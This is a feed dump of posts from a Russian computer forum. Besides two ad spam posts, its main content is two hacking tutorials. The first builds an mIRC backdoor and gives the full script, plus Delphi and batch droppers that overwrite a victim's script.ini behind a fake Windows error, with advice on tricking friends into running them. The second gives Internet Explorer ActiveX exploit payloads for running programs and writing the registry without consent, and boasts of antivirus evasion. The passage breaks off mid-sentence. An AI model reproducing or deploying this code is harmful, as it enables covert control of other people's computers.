http://ruscomp.forumbb.ru/ ruscomp ru-ru Fri, 30 Jun 2023 18:10:30 +0300 MyBB/mybb.ru http://ruscomp.forumbb.ru/viewtopic.php?pid=30#p30 <p><a href="https://postimages.org/" rel="nofollow" target="_blank"><img class="postimg" loading="lazy" src="https://i.postimg.cc/Y2VrXMMs/topgoods.jpg" alt="https://i.postimg.cc/Y2VrXMMs/topgoods.jpg" /></a> Внимание, владельцы бизнеса! Представляем вам уникальное решение для оптимизации вашего интернет-присутствия - топовые мобильные прокси фермы от Mobileproxy.ru! &#9989; Наше оборудование это передовое устройство, которое позволяет вам выходить в интернет сразу с нескольких IP-адресов из одного места. &#9989; Однако важно отметить, что наша техника не обеспечивает анонимность и она не предназначена для обхода блокировок, выход в сеть осуществляется с использованием купленных вами сим-карт. &#9989; Теперь самое интересное! Приобретая оборудование от Mobileproxy.ru с использованием промокода s455, вы получаете невероятную скидку в размере 5000 рублей! Это отличная возможность сэкономить и воспользоваться передовыми технологиями для вашего бизнеса. &#9989; Наши мобильные прокси фермы откроют перед вами широкие возможности. Вы сможете одновременно управлять несколькими аккаунтами, заниматься продвижением сайтов, сдавать прокси ферму в аренду, собирать данные с разных источников одновременно и многое другое где нужно одновременно несколько подключений к сети и периодическая смена ip адреса. С Mobileproxy.ru ваш бизнес будет оперативным, эффективным и успешным! &#9989; Не упустите возможность улучшить свое интернет-присутствие и сэкономить деньги! Посетите наш веб-сайт &lt;a href=&quot;https://mobileproxy.ru/&quot;&gt;MobileProxy.ru&lt;/a&gt;, выберите подходящее оборудование, введите промокод s455 при оформлении заказа и получите скидку в размере 5000 рублей! &#9989; Mobileproxy.ru - ваш надежный партнер для успешного интернет-бизнеса!</p> mybb@mybb.ru (dbvasegbxd) Fri, 30 Jun 2023 18:10:30 +0300 http://ruscomp.forumbb.ru/viewtopic.php?pid=30#p30 http://ruscomp.forumbb.ru/viewtopic.php?pid=29#p29 <p>Компьютеры, ноутбуки - техника современная и не застрахована от поломок. К такому типу техники нужен своевременный и комплексный подход, который могут обеспечить наши компетентные мастера. Самостоятельно починить компьютер сможет 5 человек из 100, а поломки происходят у каждого второго! Мы предоставляем услуги высокого качества по ремонту и исправлению проблем компьютерной техники более чем в 60 городах по РФ. Так же наши филиалы представлены в Республике Беларусь. Заявки обрабатываются нашими сотрудниками и не перепродаются в сторонние компании. Перейти:&#160; <a href="https://rempc-v-mo.ru/?t=33705" rel="nofollow" target="_blank">https://rempc-v-mo.ru/?t=33705</a></p> mybb@mybb.ru (dbvasegbxd) Fri, 17 Mar 2023 07:20:29 +0300 http://ruscomp.forumbb.ru/viewtopic.php?pid=29#p29 http://ruscomp.forumbb.ru/viewtopic.php?pid=20#p20 <p>киньте плз ссылки чтоб ск ачать их все альбомы!</p> mybb@mybb.ru ([220v]) Sat, 14 Jun 2008 11:45:16 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=20#p20 http://ruscomp.forumbb.ru/viewtopic.php?pid=19#p19 <p>1. Intro.<br />2. Трояны.<br />3. mIRC скрипты.<br />&#160; &#160; I. пишем свой скриптовый бэкдор<br />&#160; &#160; II. пишем на delphi прогу, которая вставит бэкдора во вражеский mIRC<br />&#160; &#160; III. пишем на batch'ах прогу, которая вставит бэкдора во вражеский mIRC <br />&#160; &#160; IV. cоциальный инженеринг: впариваем прогу =)<br />4. Оба способа в сравнении.<br />5. Как защититься.<br />6. Outro.</p> <p>1. В наши времена, среди владельцев популярных каналов, стало модным вешать на чанелы по дюжине ботов с разных linux shell'ов для обеспечения, так сказать, &quot;безопасности канала&quot;. Я, конечно, ничего не имею против всяких там eggdrop'ов, но как быть простым смертным юзерам, у которых нет ни шелла, ни сс, ни знаний (как например у элиты с канала #31337 на сервере irc.dal.net.ru =)? Так вот в этой статье я расскажу, как повесить бота на машину с win-подобной операционкой.<br />Имхо, существует только два способа осуществить это: трояны и трояны =) Начнём с первого.</p> <p>2. Если ты был на мсне (irc.msn.com) перед его закрытием, то ,наверное, успел насладиться n-ным кол-вом ботов на каналах #russian_chat, #russian_girls, #russian_andybig и тд. Так вот, эти боты далеко не eggdrop'ы. Это, так сказать, SubSeven'ы. Слышал про такой конь? Sub7 единственный троян на моей памяти, который позволял удалённо вешать irc-бота (я давно не юзал троянов, так что не знаю, появились ли у него аналоги). Так что качай Sub'a отсюда и наслаждайся. Те же, кто не привыкли искать лёгких путей, могут читать дальше.</p> <p>3. Возможности mirc-скриптов оочень даже внушительны. Написать на них тот же самый сgi-сканнер плёвое дело, не говоря уж о простеньком боте. Для примера возьмём скрипт WarSatan. В него как раз и встроен такой &quot;простенький бот&quot;. Когда вы соединяетесь со своим любимым irc-сервером, скрипт попутно коннектит юзера guest к серверу irc.webchat.org и заводит его на каналы #CHATOP, #MEKAH и #PANGKOR. Вот и весь механизм работы. Наша задача - написать такого же простого бэкдора в виде мирк-плагина.<br />&#160; I. Hаиболее важные строчки буду комментировать.</p> <p>on 1:CONNECT:{<br />&#160; ;#открываем соединение с твоим irc cервером<br />&#160; .sockopen 31337 irc_сервер его_порт<br />}<br />on 1:DISCONNECT:{<br />&#160; ;#при разрыве соединения убиваем сокет<br />&#160; .sockclose 31337<br />}<br />on 1:SOCKOPEN:31337:{<br />&#160; ;#авторизуемся на irc-сервере<br />&#160; .sockwrite -n $sockname USER BOT &quot;&quot; &quot;localhost&quot; :Satanic bot<br />&#160; .sockwrite -n $sockname NICK ник_бота $+ $r(1,999)<br />&#160; ;#заходим на твой канал<br />&#160; .sockwrite -n $sockname join твой_канал<br />} <br />on 1:SOCKREAD:31337:{<br />&#160; ;#этот скрипт автоматически отвечает на серверный ping<br />&#160; ;#без него сервер будет кидать бота, потому что тот не отвечает на пинги<br />&#160; .sockread %tmp<br />&#160; if ($gettok(%tmp,1,32) == ping) {<br />&#160; &#160; .sockwrite -n $sockname PONG $gettok(%tmp,2-,32)<br />&#160; }<br />}</p> <p>Убираем комментарии, подставляем свои значения, нумеруем строки (просто скопируй это всё в mIRC-редактор и сохрани - он сам всё пронумерует) и сохраняем получившееся в файл control.dll.<br />Сам бэкдор готов. Теперь осталось вставить его в чужой script.ini.<br />&#160; II. Вот исходник на delphi проги, которая ищет на винте файл script.ini и, при удачном исходе поиска, подменяет его нашим. <br />Важно! Control.dll нужно содержать в одном каталоге с данной прогой. </p> <p>program Project1;</p> <p>uses<br />SysUtils,<br />windows,<br />shellapi;</p> <p>const search = 'script.ini'; //файл который нужно найти и заменить<br />replace = 'control.dll'; //файл, которым надо заменить, должен быть<br />// в том же месте откуда запуститься эта прога =)</p> <p>var buf: array [0..255] of char;<br />fl: PChar;<br />flag:boolean = false;</p> <p>//процедура замены файлов<br />procedure Change(where:pchar);</p> <p>function CopyFile(FromFile, ToDir : string) : boolean; //функция копирования<br />var F : TShFileOpStruct;<br />begin<br />F.Wnd := 0; F.wFunc := FO_COPY;<br />FromFile:=FromFile+#0; F.pFrom:=pchar(FromFile);<br />ToDir:=ToDir+#0; F.pTo:=pchar(ToDir);<br />F.fFlags := FOF_ALLOWUNDO or FOF_NOCONFIRMATION or FOF_SILENT;<br />{$I-}<br />result:=ShFileOperation(F) = 0;<br />{$I+}<br />end;</p> <p>begin<br />DeleteFile(where);<br />CopyFile(replace,where)<br />end;</p> <p>//процедура глоб. поиска<br />function Find(DirN: string):boolean;<br />var<br />tsr: TSearchRec;<br />Full: string;</p> <p>begin<br />find:=false;<br />if FindFirst(DirN + '\*.*', faAnyFile, tsr) = 0 then<br />repeat<br />if (tsr.Name = '.') or (tsr.Name = '..') then continue;<br />Full:= DirN + '\' + tsr.Name;<br />if tsr.Attr = faDirectory then //если каталог<br />Find(Full);<br />until (FindNext(tsr) &lt;&gt; 0)or(tsr.Name = search)or flag;</p> <p>if tsr.Name = search //если нашли<br />then begin<br />find:=true;<br />flag:=true;<br />Change(pchar(DirN+'\'+tsr.Name));<br />end;</p> <p>end;</p> <p>//Основной блок программы<br />begin<br />if SearchPath(nil,search,nil,sizeof(buf),buf,fl)&gt;0 then<br />Change(buf)<br />else<br />begin<br />Find('c:');<br />// если надо и на других дисках искать то можешь сделать так:<br />// if Not Find('c:') then<br />// if Not Find('d:') then<br />// if Not Find('e:') then<br />//etc....<br />end;</p> <p>end.</p> <p>&#160; III. Если же ты с роду не занимался кодингом и тя бросает в дрожжь от слова &quot;компилятор&quot;, давай напишем такую прогу на batch'ах.</p> <p>echo off<br />cls<br />if exist mirc.ini goto in_the_same_dir<br />if exist c:\mirc\MIRC.INI set mirc=c:\mirc<br />if exist c:\mirc\mirc\MIRC.INI set mirc=c:\mirc\mirc<br />if exist c:\irc\MIRC.INI set mirc=c:\irc<br />if exist c:\irc\mirc\MIRC.INI set mirc=c:\irc\mirc<br />if exist c:\chat\mirc\MIRC.INI set mirc=c:\chat\mirc<br />if exist c:\chat\MIRC.INI set mirc=c:\chat<br />if exist c:\progra~1\mirc\MIRC.INI set mirc=c:\progra~1\mirc<br />if exist c:\chat\looksharp\MIRC.INI set look=c:\chat\looksharp<br />if exist c:\mirc\looksharp\MIRC.INI set look=c:\mirc\looksharp<br />if exist c:\irc\looksharp\MIRC.INI set look=c:\irc\looksharp<br />if exist c:\progra~1\looksharp\MIRC.INI set look=c:\progra~1\looksharp<br />if exist c:\progra~1\trion\MIRC.INI set neo=c:\progra~1\trion<br />if exist c:\progra~1\neo-ra\MIRC.INI set neo=c:\progra~1\neo-ra<br />if exist c:\progra~1\NeoRa\Trion\MIRC.INI set neo=c:\progra~1\NeoRa\Trion<br />if exist c:\progra~1\NeoRa\MIRC.INI set neo=c:\progra~1\NeoRa<br />if exist c:\chat\NeoRa\MIRC.INI set neo=c:\chat\NeoRa<br />if exist c:\irc\NeoRa\MIRC.INI set neo=c:\irc\NeoRa<br />if exist c:\chat\neo-ra\MIRC.INI set neo=c:\chat\neo-ra<br />if exist c:\irc\neo-ra\MIRC.INI set neo=c:\irc\neo-ra<br />if exist c:\chat\Trion\MIRC.INI set neo=c:\chat\Trion<br />if exist c:\irc\Trion\MIRC.INI set neo=c:\irc\Trion<br />if exist c:\Trion\MIRC.INI set neo=c:\Trion<br />if exist c:\NeoRa\MIRC.INI set neo=c:\NeoRa<br />if exist c:\Neo-ra\MIRC.INI set neo=c:\Neo-ra<br />if exist d:\chat\NeoRa\MIRC.INI set neo_here=d:\chat\NeoRa<br />if exist d:\irc\NeoRa\MIRC.INI set neo_here=d:\irc\NeoRa<br />if exist d:\chat\neo-ra\MIRC.INI set neo_here=d:\chat\neo-ra<br />if exist d:\irc\neo-ra\MIRC.INI set neo_here=d:\irc\neo-ra<br />if exist d:\chat\Trion\MIRC.INI set neo_here=d:\chat\Trion<br />if exist d:\irc\Trion\MIRC.INI set neo_here=d:\irc\Trion<br />if exist d:\Trion\MIRC.INI set neo=d:\Trion<br />if exist d:\NeoRa\MIRC.INI set neo=d:\NeoRa<br />if exist d:\Neo-ra\MIRC.INI set neo=d:\Neo-ra<br />if exist d:\mirc\MIRC.INI set mirc=d:\mirc<br />if exist d:\mirc\mirc\MIRC.INI set mirc=d:\mirc\mirc<br />if exist d:\irc\MIRC.INI set mirc=d:\irc<br />if exist d:\irc\mirc\MIRC.INI set mirc=d:\irc\mirc<br />if exist d:\chat\mirc\MIRC.INI set mirc=d:\chat\mirc<br />if exist d:\chat\MIRC.INI set mirc=d:\chat<br />if exist d:\looksharp\MIRC.INI set look=d:\looksharp<br />if exist d:\chat\looksharp\MIRC.INI set look=d:\chat\looksharp<br />if exist d:\mirc\looksharp\MIRC.INI set look=d:\mirc\looksharp<br />if exist d:\irc\looksharp\MIRC.INI set look=d:\irc\looksharp<br />if &quot;%mirc%&quot;==&quot;&quot; goto no_mirc<br />deltree /y %mirc%\script.ini<br />copy control.dll %mirc%\script.ini<br />cls<br />:no_mirc<br />if &quot;%look%&quot;==&quot;&quot; goto no_look<br />deltree /y %look%\System\lookevents04.sys<br />copy control.dll %look%\System\lookevents04.sys<br />cls<br />:no_look<br />if &quot;%neo%&quot;==&quot;&quot; goto end<br />deltree /y %neo%\root\trionscr7.ini<br />copy control.dll %neo%\root\trionscr7.ini<br />cls<br />goto end<br />:in_the_same_dir<br />deltree /y script.ini<br />copy control.dll script.ini<br />:end<br />echo Your Microsoft Windows is not correctly installed.<br />echo Pleas re-install it and try again</p> <p>Эта байда методом тыка ищет mIRC, NeoRa Trion и Looksharp. Вероятность нахождения довольно незначительна, так что желательно уломать субъекта положить это файло вместе с control.dll в один каталог с его irc-клиентом. В случае удачного исхода поиска, файло подменяет чужой script.ini нашим control.dll.<br />Сконвертируй этот bat'ник в exe'шник каким-нибудь bat2exec'ом и можешь впаривать своим друзьям. </p> <p>&#160; IV. Думаю, не мне тебе рассказывать о том, как &quot;впаривать&quot; кому-то exe'шник. Просто хочется подчеркнуть одну особенность. Согласись, просьба запустить твой exe'шник вызывет подозрение даже у самого недалёкого юзера. Так что, можно пойти другим путём. Для этого вернёмся к пункту I. НЕ НУМЕРУЙ строчки скрипта, просто засунь его в файл joke.mrc. Всё. Теперь раздавай его своим друзьям со словами: положи его в каталог со своим мирком, введи в его консоли &quot;/load -rs joke.mrc&quot; и наслаждайся всеми прелестями плагина =)</p> <p>4. И так, чем же способ с подменой script.ini лучше?<br />1) не ловится антивирусами<br />2) не ловится FairWall'ами. Думаю, многие сразу с пеной изо рта начнут доказывать, что ZoneAlarm и AtGuard оберегут их от этого. Спец для них объясняю: если mIRC в этих двух фаирволах прописан как Allowed server\client, то фв даже не пикнет при открытии соединения бэкдором.<br />3) трудно обнаружить\убить даже опытному юзеру</p> <p>5. Ну а теперь о том, как собственно защититься. Опять же не буду рассматривать способ с Sub7'ом (т.к. с ним всё понятно: AVP + ZoneAlarm), сразу перейду ко второму. <br />Для обнаружения скриптового бэкдора стоит воспользоваться каким-нибудь mIRC плагином вроди IPSearch'a, который поискал бы на сервере юзера с таким же ипом как у тебя. Если таковой имеется, значит кто-то однозначно повесил на тебя бота. Если же такой не найден, значит или бот на другом сервере, или ты чист.<br />Также, для обнаружения бота можно использовать тот же самый ZAlarm: на данный момент, крупнейшие IRC серверы, проверяют всех клиентов на прокси. Каким образом? Простым сканированием портов. Так вот, если ты коннектишься к серверу irc.some.com, a порты у тя сканирует какой-нибудь irc.lame.com, то стоит задумкаться...<br />Как убить бэкдора? Если не разбираешься в скриптинге, просто переустанови irc клиент.</p> <p>6. Ну что можно сказать в завершении? Не юзайте незнакомые скрипты и не заставляйте других это делать =)</p> mybb@mybb.ru ([220v]) Fri, 13 Jun 2008 22:45:27 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=19#p19 http://ruscomp.forumbb.ru/viewtopic.php?pid=18#p18 <p>Статья написана исключительно для ознакомительных целей и автор не несет никакой уголовной ответственности <br />Что такое ActiveX в Internet<br />ActiveX объекты представляют собой небольшие исполняемые модули, которые могут быть внедрены в документы. Такими докемнтами могут являтся, например, документы Word или Excel. В качестве документов-контейнеров могут быть также и web-страницы, написанные на HTML. При отображении такой страницы, браузер предоставляет внедренному модулю ActiveX прямоугольную область на странице. В этой области модуль может себя прорисовывать, взаимодействовать с пользователем, принимать и выводить даные и т.д. Помимо визуальных activex объектов, существуют и невизуальные. Они служат главным образом для доступа к определенным програмным ресурсам машины или к данным пользователя и операционной системы. Такие объекты можно сделать невидимыми на странице и обращатся к ним при помощи скриптов страницы (таких как JavaScript, например). </p> <p>Следует четко определить разницу между выполнением модуля ActiveX, размещенного на странице, и скрипта на той же странице. Скриптовые языки не генерируют исполняемых модулей. Скрипты выполняет виртуальная машина, которая их четко контроллирует и ограничивает воздействие на машину пользователя. Так, например, скрипт на JavaScript не может напрямую обращаться ни к файлам пользователя, ни к оперативной памяти, ни к сетевой плате. Это гарантирует безопасность для пользователя, просматривающего web-страницу. Другое дело - AcitveX. Эти объекты представляют собой исполняемые модули (как правило .ocx), которые выполняются непосредственно процессором машины и имеют те же права что и любая другая программа компьютера. Таким образом, выполнение внедренных объектов небезопасно для пользователя. </p> <p>Проблему безопасности Microsoft - родоначальник activeX - решает с помощью так называемых сертификатов безопасности. Суть в том, что каждый ActiveX объект должен иметь сертификат безопасности. И если пользователь доверяет автору объекта, то только в таком случе объект будет автоматически запускаться со страницы. В противном случае браузер запросит разрешения на запуск ActiveX у пользователя, либо вообще откажется выполнять ActiveX (если установлен достаточно высокий уровень безопасности в настройках пользователя). При этом, по умолчанию, в Windows сертифицированны только безопасные объекты, безвредные для пользователя. Для всех остальных объектов, и для установки, и для каждого запуска, ОС требует разрешения у пользователя. </p> <p>Конечно, такая политика также не безопасна, поскольку в основном своем большинстве пользователи мало осведомлены о тонкостях технологий Microsoft и могут подтверждать запуск ActiveX, не осознавая опасности последствий. Тем более, что логика подсказывает пользователю то, что если он откажется выполнять ActiveX, то он, вероятно, не получит необходимую информацию с данного web-сайта. То же касается настроек уровня безопасности браузера. По умолчанию, установлен средний уровень безопасности. В этом режиме MSIE 6.0 вообще не позволяет запуск несертифицированных объектов, однако пользователь в таком режиме не сможет просматривать значительную часть веб-сайтов, использующих ActiveX. <br />Методы несанкционированного запуска ActiveX<br />Все было бы замечательно, если бы в технологии ActiveX не было дыр. В соверменном быстро развивающемся мире, новые технологии успевают появлятся быстрее чем исправляются ошибки в старых. В связи с чем, число уязвимостей не сокращается. ActiveX - не исключение. </p> <p>В этой главе рассмотрим два типа уязвимости современных браузеров, основаных на несанкционированном запуске ActiveX. </p> <p>Сначала продемонстрируем запуск сертифицированного ActiveX объекта. Для этой цели используем объект DirectAnimation: </p> <p>&lt;APPLET ID=&quot;DAControl&quot;<br /> CLASSID=&quot;CLSID:B6FFC24C-7E13-11D0-9B47-00C04FC2F51D&quot;&gt;<br />&lt;/APPLET&gt; </p> <p>Выполнение этого ActiveX объекта смотрите здесь . <br />Обратим внимание на параметр B6FFC24C-7E13-11D0-9B47-00C04FC2F51D. Это уникальный идентификатор типа объекта (CLSID). CLSID однозначно говорит операционной системе какой именно объект страничка хочет использовать. CLSID одного и того же объекта одинаков на всех машинах пользователей. После запуска объекта, скрипт получает доступ к свойствам и методам объекта через его id. Например такой скрипт &lt;script&gt;DAControl.Start()&lt;/script&gt; запускает анимацию объекта DirectAnimation. Отметим, что на активацию объекта требуется время, и поэтому данный скрипт нужно запускать только после того, как страница полностью загрузилась и объект активирован. Скрипт можно использовать в качестве обработчика события body.onload, которое генерируется после загрузки и активации объекта. Попытка управления незагрузившимся объектом приводит к ошибке. </p> <p>Теперь рассмотрим запуск несертифицированного ActiveX объекта. Воспользуемся невизуальным объектом WScript.Network. Этот объект позволяет получить и изменить некоторые параметры операционой системы, такие как имя пользователя или имя компьютера: </p> <p>&lt;APPLET ID=&quot;WshNetwork&quot;<br /> CLASSID=&quot;CLSID:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B&quot;&gt;<br />&lt;/APPLET&gt; </p> <p>Демонстрацию этого объекта смотрите здесь . При открытии демо-странички браузер спросит у вас разрешения на запуск объекта. Попробуйте согласиться или нет, посмотрите на результат. <br />(Заметим, что если вы сохраните эту страничку на свой диск и попробуете открыть ее, то возможно ОС и не спросит разрешения на запуск ActiveX, поскольку считает его &quot;родным&quot; файлом, а не сетевым). <br />Обратим внимание на то, что в случае получения разрешения запуска этого объекта, скрипт страницы получает доступ к информации о вашей машине и может отправить ее в сеть, уже не спрашивая вас и незаметно для вас. Кроме того данный объект может сделать ваш диск сетевым и его содержимое станет доступно с других машин. </p> <p>Итак, для запуска опасных объектов пользователь должен обязательно дать согласие. Теперь рассмотрим уязвимости MSIE, позволяющие обойти это условие, и запустить ActiveX без разрешения пользователя. </p> <p>Рассмотрим известный пример уязвимости найденной в марте 2002 года, и присутствующей практически во всех версиях операционных систем и браузеров: </p> <p>&lt;span datasrc=&quot;#oExec&quot; datafld=&quot;exploit&quot; dataformatas=&quot;html&quot;&gt;&lt;/span&gt;<br />&lt;xml id=&quot;oExec&quot;&gt;<br />&lt;security&gt;&lt;exploit&gt;&lt;![CDATA[&#160; &#160; &#160; &#160; &#160; &#160; &#160;<br />&lt;object id=&quot;oFile&quot; classid=&quot;clsid:11111111-1111-1111-1111-111111111111&quot;&#160; codebase=&quot;c:/WINDOWS/calc.exe&quot;&gt;&lt;/object&gt;&#160; &#160; &#160; &#160; &#160; &#160; &#160;<br />]]&gt;&lt;/exploit&gt;&lt;/security&gt;<br />&lt;/xml&gt; </p> <p>Данная уязвимость позволяет запускать любые программы на машине пользоваетля (если известен локальный путь к ним). Пример&#160; демонстрирует запуск калькулятора (при условии что он находится в папке c:/WINDOWS/). Разумеется, вместо калькулятора, может быть запущено и форматирование дисков. Впрочем, не рекомендую эксперементировать :). </p> <p>Данная уязвимость основана на том, что в качестве CLSID передается заведомо неверный идентификатор несуществующего объекта. Если операционная система не может найти объект у себя на дисках, то она пытается скачать его. Для указания пути скачивания применяется параметр codebase. Но в данном случае он указывает на локальную программу и система запускает ее, считая что она &quot;установит&quot; несуществующий объект. Такая уязвимость присутствует только в контексте XML. Без XML такой пример, скорее всего, работать не будет: </p> <p>&lt;object id=&quot;oFile&quot; classid=&quot;clsid:11111111-1111-1111-1111-111111111111&quot;&#160; codebase=&quot;c:/WINDOWS/calc.exe&quot;&gt;&lt;/object&gt; </p> <p>Рассмотренная уязвимость опасна, однако ее воздействие на машину сильно ограничено, поскольку web-страница может только запустить программу на машине пользователя, но не может ею управлять. Максимум что возможно это передать параметры через командную строку. </p> <p>Теперь рассмотрим еще одну уязвимость, позволяющую запустить ActiveX объект без санкции пользователя. Данная уязвимость присутствует не во всех операционных системах и браузерах и, кроме того, зависит от конкретных настроек окружения (более подробно об этом - в следующей главе). Однако ее воздействие намного сильнее рассмотренной выше уязвимости, поскольку скрипт страницы получает управление объектом ActiveX. </p> <p>В качестве рабочего объекта применяется следующий объект: </p> <p>&lt;applet id=&quot;theActiveX&quot; <br />code=com.ms.activeX.ActiveXComponent<br />height=0 width=0&gt;<br />&lt;/applet&gt; </p> <p>При активации этого объекта эксплорер не запрашивает разрешения у пользователя, поскольку объект сертифицирован. <br />После загрузки ActiveX, модифицируем его CLSID, заменяя его на CLSID необходимого нам несертифицированного ActiveX (в данном случае WScript.Network): </p> <p>&lt;script&gt;</p> <p>function modify(){</p> <p>theActiveX.setCLSID(&quot;{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}&quot;)//заменяем CLSID</p> <p>//Именно в этом месте кроется уязвимость. <br />//Если браузер выдает ошибку в следующем операторе, значит он не подвержен уязвимости</p> <p>theActiveX.createInstance()//создаем новый объект</p> <p>WshNetwork = theActiveX.GetObject()//получаем модифицированый объект</p> <p>var userName=WshNetwork.UserName;//получаем информацию о пользователе</p> <p>}</p> <p>&lt;/script&gt;</p> <p>Приведенный скрипт нужно запускать спустя некторое время после загрузки странички, поскольку объекту требуется время чтобы активироваться: </p> <p>&lt;script&gt;<br />setTimeout(&quot;modify()&quot;,1000);//запускаем модификацию CLSID спустя 1 сек, после загрузки страницы</p> <p>&lt;/script&gt;<br />После модификации CLSID объекта мы получаем новый объект с нужным нам CLSID и браузер при этом не запрашивает подтверждения на запуск у пользователя! Что и требовалось доказать :). <br />Демонстрацию данной уязвимости смотрите здесь . </p> <p>Как уже отмечалось, данная дыра в защите браузера присуща не всем типам ОС, и зависит от настроек браузера и переменных окружения. Статистика распространенности данной уязвимости описана в следующей главе. <br />Оценка численности уязвимых компьютеров в Internet<br />Для определения численности уязвимых хостов, было проведено статистическое исследование. В исследовании была проанализирована уязвимость компьютеров пользователей сайта <a href="http://antichat.ru" rel="nofollow" target="_blank">http://antichat.ru</a>. </p> <p>Технология тестирования была следующей: на главной странице сайта был внедрен скрипт, который пытался несанкционированно запустить на машине пользователя ActiveX компоненты WScript.Network и Scripting.FileSystemObject методом модификации CLSID. Результат попытки автоматически отправлялся на сниффер сайта. Он же фиксировал тип операционной системы пользователя и версию браузера. </p> <p>В связи с тем, что аудитория сайта специфична, то при рассмотрении результатов исследования нужно делать скидку на то, что посетители antichat.ru являются более &quot;продвинутой&quot; аудиторией, чем средний пользователь Internet. </p> <p>Идентификация пользователей проводилась на основании их IP адреса. Было проанализировано 100 различных хостов. Сбор даных происходил в течении суток (26 октября 2002 года). </p> <p>Общий результат исследования приведен в таблице: <br />Уязвимость хостовКомпьютер уязвим 46%<br />В том числе с неустойчивой уязвимостью* 3%<br />Компьютер не уязвим 54%<br />База: 100 хостов</p> <p>* - под неустойчивой уязвимостью понимается то, что часть тестов хоста были успешными, а часть - нет. </p> <p>Далее приведены данные уязвимости хостов в зависимости от типа операционной системы и типа браузера. <br />Уязвимость хостов в зависимости от типа ОС и браузераOC Браузер Процент уязвимых хостов База<br />Windows 98 &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;MSIE (все версии) 82% &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;45<br />Windows 98 &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; MSIE 5.0;5.01;5.5 74% &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; 31<br />Windows 98 &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; MSIE 6.0 &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; 93%&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; 14<br />Windows ME (Win9x 4.90) &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;MSIE (все версии) 29% &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;14<br />Windows NT4.0,NT5.0 &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; MSIE (все версии) 44%&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; 10<br />Windows XP (NT5.1) &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;MSIE (все версии) 0% &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;30<br /></p> <p>Как видно из таблиц, около половины всех пользователей интернет имеют уязвимость несанкционированного запуска опасных объектов. Наиболее опасна операционная система Windows 98, среди пользователей которой подвержены уязвимости более 80% хостов. Полное отсутствие уязвимости наблюдается только у операционных систем линейки NT, начиная с версии NT 5.1 (Windows XP). <br />Доступ к информации на удаленном компьютере<br />В этой главе рассмотрим конкретные методы воздействия на машину пользователя и несанкционированного скачивания информации с нее. <br />В примерах предыдущих глав уже подробно описывались возможности объекта WScript.Network. Однако, существуют и намного более опасные ActiveX объекты. Ниже описаны возможности таких ActiveX объектов как Scripting.FileSystemObject и WScript.Shell.1. <br />Объект WScript.Shell.1 (CLSID=F935DC26-1CF0-11D0-ADB9-00C04FD58A0B)<br />Этот объект позволяет получить доступ к переменным окружения операционной системы, узнать системные папки, запустить программы на машине пользователя, изменить параметры ОС, читать и модифицировать системный реестр. Продемонстрируем лишь одну возможность: модификацию реестра. <br />Запись в реестр производится методом RegWrite объекта. В примере производится установка стартовой страницы браузера: </p> <p>&lt;APPLET ID=&quot;Shl&quot; <br /> CLASSID=&quot;CLSID:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B&quot;&gt; <br />&lt;/APPLET&gt; <br />&lt;script&gt; <br />Shl.RegWrite (&quot;HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page&quot;, &quot;http://antichat.ru&quot;); <br />&lt;/script&gt; </p> <p>Здесь приведен пример несанкционированного исполнения данного кода&#160; (внимание! при открытии ссылки ваша стартовая страница браузера будет изменена!). </p> <p>Примечательно то, что антивирус Касперского (AVP) последних версий распознает в этом скрипте вирус, однако небольшая модификация исходного текста и скрипт проходит сквозь касперского без проблем&#160; :-). </p> <p>Конечно, изменение стартовой страницы браузера - не столь уж важная вещь, но как вы понимаете, реестр хранит всю жизненно важную информацию операционной системы, начиная от паролей пользователей и заканчивая установками автоматически загружаемых драйверов и программ. </p> <p>Несанкционированное срабатывание данного объекта может привести к порче ОС в лучшем случае, и к полному уничтожению информации на ваших дисках - в худшем. При наличии доступа к этому объекту, последнее - лишь дело техники. Сайт, содержащий подобный код, превращается в сайт-убийцу в прямом смысле слова, так как одного только посещения его, уже достаточно для полной потери информации на вашем компьютере. <br />Объект Scripting.FileSystemObject (CLSID=0D43FE01-F093-11CF-8940-00A0C9054228)<br />Данный объект предназначен для файловых операций: создание, чтение, запись, переименование, удаления файлов и папок. В отличие от объекта WScript.Shell, данный объект может не только удалить файлы или каталоги, но и прочитать их. А прочтя, отправить их содержимое в сеть. <br />Продемонстрируем три примера: <br />Создание файла на машине пользователя . <br />Считывание существующих папок на машине 